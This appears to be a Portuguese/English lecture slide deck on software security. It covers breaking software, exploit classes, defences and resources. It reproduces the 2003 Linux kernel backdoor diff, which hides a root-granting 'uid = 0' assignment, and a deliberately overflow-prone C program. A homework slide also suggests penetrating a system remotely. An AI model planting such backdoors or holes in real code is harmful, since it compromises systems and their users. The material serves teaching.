Break, Exploit, Protect..

Nuno Morgadinho

What do you mean?

• Break = crashar, freezar, detectar memory leaks, etc..
• Exploit = explorar uma falha de segurança
• Protect = prevenir, defender, proteger, detectar, etc..

Hacking vs Security

• Hacking = design beautiful software [1].
• Security = aspect of computing that has been romanticized consistently [2].





[1] - "Hackers and Painters", Paul Graham
[2] - "A Taste of Computer Security", Amit Singh

Segurança Física

• Abrir fechaduras com uma Bumping Key
• Grande maioria das fechaduras existentes em Portugal estão vulneráveis a este tipo de ataque.
• Impressões Digitais
São fáceis de duplicar por exemplo com produtos domésticos.
• Engenharia Social (Cadeias de Confiança), Etc.
• Fora do âmbito de hoje!

Quote

• "I have been told that one of the reasons for the longevity of the Roman bridges is that their designers had to stand under them when they were first used. It may be time to put a similar discipline into the software field."
  
  -- Henry Baker, in an exquisite rant about buffer overflows, taken from Nat Friedman Web Blog

Trinity of Trouble

• What is making software behave so hard?
• Complexity
• Extensibility
• Connectivity

Trinity of Trouble II

• Complexity
• 1983, Microsoft Word tinha 27,000 linhas de código.
• 1995, up to 2 million!
• Windows XP - 40 million lines of code
• Extensibility - complex architectures, unwanted malicious extension, etc..
• Connectivity - small failures will propagate, post on a Web site will be viewed by millions in a matter of hours, etc..

Break

• Crazy Input
• Blackbox (sem código, como tentar exploitar uma máquina de latas)
• Whitebox (com código, atráves de auditorias, monitorização, etc.)
• Graybox (com e sem código, exploitar a máquina de latas sabendo como o sistema de alavancas está implementado)
• Reverse Engineering

Break II (Some Tools..)

• Rational's Purify
• "Scalable, non-intrusive memory leak and memory corruption detection for enhanced debugging and problem diagnosis."
• dyninstAPI
• attach to a process and gather measurements in real time. Doesn't require source code!

Exploit I

• Overflow (Stack, Heap, Database, Java, Integer, etc..)
• Erros aritméticos na gestão de memória
• Format String
• SQL injection
• Rootkits, Kernel Modules
• Malware/Spyware (Virus, Worms, Trojans, Backdoors, etc.)
• Keyloggers
• Scanning, Fingerprinting, Sniffing, etc

Linux backdoor attempt

--- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
  schedule();
  goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
  retval = -ECHILD;
  end_wait4:
  current->state = TASK_RUNNING;

• Onde está o problema? :-)
• How sure are you of not being backdoored?

Exploit II (With Frameworks!)

• Metasploit  
• SecurityForest's Exploitation Framework  
• Immunity's CANVAS ($$$)
• Core Impact ($$$)
• etc.
• "Exploiting software is an art and a challenge."

Em Portugal..

• Homebanking (keyboard pads & passwords vs malware)
• Juízes e Procuradores Queixam-se..
• "..Segundo a magistrada já lhe aconteceu de tudo, desde verificar que tinham retirado o jumper que faz um reset à bios, e consequentemente à password, para aceder à informação contida nos discos rígidos até mensagens de que o computador estava a ser partilhado por mais utilizadores quando o tentava desligar." Fonte: Diário de Notícias
• Site da Chip 7 defaced (a 4 de Dezembro de 2005)

Protect

• Firewall
• Honeypot
• IDS, IPS
• Stackguard, ProPolice, etc.
• etc.

Resources

• You will never know it all, so mind with your capacity to know
• Challenges
• Books
• School
• Web (PTnix.com, etc.)
• Computer-Related Risks Mailing List, etc.
• Conferences - Defcon, Hackers at Large, etc.

The Future

• Desaparecimento do SO
• Uso em massa de redes Wireless
• Embedded systems (attacking network embedded systems presented at defconX)
• Truly distributed computation
• More PDAs (and other embedded systems)
• Diet Nmap
• etc.

Vulnerable Program

main(int argc , char argv[])
{
  char rest[100];
  char first;
  char *e;
  e = getenv("NAME");
  if(!e) exit(1);
  if(strlen(e)>sizeof(rest)) exit(1);
  first = e[0];

  printf("First char =%c\n",first);
  printf("the rest =%s\n",rest);
}

What's happening

• The programmer isn't checking the size of what he is copying. That means we can write beyond the buffer length and overwrite the return address when strcpy gets executed.

..
e = getenv("NAME");
if(!e) exit(1);
if(strlen(e)>sizeof(rest)) exit(1);
first = e[0];
strcpy(rest, &e[1]);
..

Buffer Overflows

• How does buffer overflows still afect software?
• D. J. Bernstein anunciou a descoberta de 44 falhas de segurança em software UNIX de renome
• Lista de programas vulneráveis: CUPS, NASM, mpg123, MPlayer, xine-lib, etc
• descobertas por alunos na disciplina de "UNIX Security Holes"
• Numa turma de 25, deviam ter sido descobertas 250 falhas de segurança mas apenas 44 foram efectivamente descobertas e exploitadas.
• A maior parte da turma irá chumbar. Mas como dizia um amigo meu, o que conta não é o fim, é o caminho que se percorre.

OpenBSD mmap

• Ideia do novo mmap no OpenBSD
• fazer com que a system call mmap retorne um endereço de memória aleatório
• assegurar que dois objectos não sejam alocados lado a lado
• alterar a malloc() para que esta use a mmap() para obter memória
• Consequência: a lot of new overflows are found!
• "We know that what this new malloc is doing is perfectly legal, but that realistically some open source software is of such low quality that it is just not ready for these things to happen." -- Theo De Raadt, OpenBSD founder

Homework

• Descobrir uma vulnerabilidade
• Descobrir exploits que a exploram
• Penetrar num sistema remotamente
• "Verificar se a casa está limpa!"